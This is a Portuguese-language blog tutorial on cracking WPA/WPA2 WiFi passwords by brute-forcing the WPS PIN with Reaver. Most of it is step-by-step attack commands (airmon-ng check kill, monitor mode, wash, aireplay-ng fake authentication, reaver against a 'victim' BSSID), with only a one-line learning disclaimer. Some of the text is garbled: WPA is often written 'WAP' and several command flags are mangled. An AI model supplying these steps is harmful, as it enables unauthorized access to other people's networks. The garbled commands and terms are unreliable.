Como Hackear WPA/WPA2 WiFi com Reaver

Todos sabemos que a maioria das pessoas prefere colocar uma senha WiFi à sua conexão sem fio. Isto pode ser tão simples como 12345 ou tão complexo como uma combinação de múltiplas letras, números e caracteres. Bem, aqui estão as más notícias, há uma ferramenta com o nome reaver que pode ser usada para quebrar a sua senha WiFi WAP/WAP2.

Sobre WEP, WAP e WAP2

Para melhorar as funções do WEP (Wired Equivalent Privacy), o WiFi Protected Access ou WPA foi criado em 2003. Este melhoramento temporário ainda tem uma segurança relativamente fraca mas é mais fácil de configurar. WPA usa o Temporal Key Integrity Protocol (TKIP) para criptografia mais segura do que a WEP oferecida.

Um ano mais tarde, em 2004, o WiFi Protected Access 2 ficou disponível. O WPA2 tem maior segurança e é mais fácil de configurar do que as opções anteriores. A principal diferença com o WPA2 é que ele usa o Advanced Encryption Standard (AES) em vez do TKIP.

What You Need.

>

    >

  • Um adaptador WiFi que suporta modo monitor
  • Um computador com WiFi
  • >

  • Uma rede WiFi protegida por WPA próxima
  • >

  • Reaver instalado
  • >

  • Persistência
  • >

>

Assumo que o seu router está configurado para não usar a autenticação por botão de pressão.(PBC)

Vamos fazer isto

Primeiro, se estiver a utilizar uma máquina virtual, tem de activar o seu controlador USB, indo às definições, depois clique em USB e escolha o seu dispositivo USB.

NB: Certifique-se de que o adaptador sem fios que está a utilizar suporta o modo monitor.

Após isso, execute o seguinte comando:

iwconfig

Este comando mostra apenas interfaces sem fios

Executar:

sudo ifconfig wlan0 down

Esta opção desactiva WiFi

Então:

sudo airmon-ng check kill

Este comando mata qualquer processo que possa interferir com o uso da minha interface no modo monitor. Ele mata o gerenciador de rede para que não haja internet.

Então execute:

iwconfig wlan0 mode monitor

Este comando muda o modo do modo gerenciado para o modo monitor.

O modo gerenciado é o modo padrão para todos os dispositivos sem fio.

A razão pela qual precisamos mudar o modo de modo gerenciado para modo monitor é porque não só queremos capturar os pacotes que têm o endereço MAC para o nosso dispositivo, mas todos os pacotes, mesmo aqueles enviados para o roteador e outros dispositivos. Isto só é possível quando o adaptador WiFi está em modo monitor.

Então run:

sudo ifconfig wlan0 up

Isso traz o wifi de volta.

Então run:

iwconfig

Isso é para verificar se o nosso modo mudou de gerenciado para monitor. Se mudou, deve ser indicado no terminal.

A figura abaixo mostra que o modo mudou de monitor.

wash - interface wlan0

Isso mostra todos os Aps WPS habilitados usando interface wireless.

Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0

Para ID mac abra uma nova aba e digite ifconfig. Copie os primeiros 12 dígitos da unspec em wlan0.

DON’T HIT ENTER YET.

Abra outra nova aba.

Confirme que você tem o reaver instalado. Se você não tiver, execute o seguinte comando.

Sudo apt-get install aircrack-ng reaver

Esta vai instalar o reaver.

Reaver brute força o pino e o associa ao alvo, uma vez que ele tem o pino, ele o usa para calcular a chave WAP/WAP2 real.

A seguir execute o seguinte comando:

Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate

Escreva enter nesta aba e também pressione enter na outra aba que eu disse para não pressionar enter.

>

Esta operação deve demorar alguns minutos uma vez que está a tentar todas as combinações possíveis e finalmente irá dar-lhe o pin WPS, a password WAP e o nome do Wi-Fi

DISCLAIMER. Este artigo é para fins de aprendizagem, não nos responsabilizamos por qualquer dano causado enquanto nos referimos a ele.

Artigo por Restercuter Nyawira, membro da SheHacks KE, treinadora e entusiasta da segurança cibernética. Encontre-a no LinkedIn (Restercuter Nyawira) e no Twitter @Restercuter1.

Deixe uma resposta

O seu endereço de email não será publicado.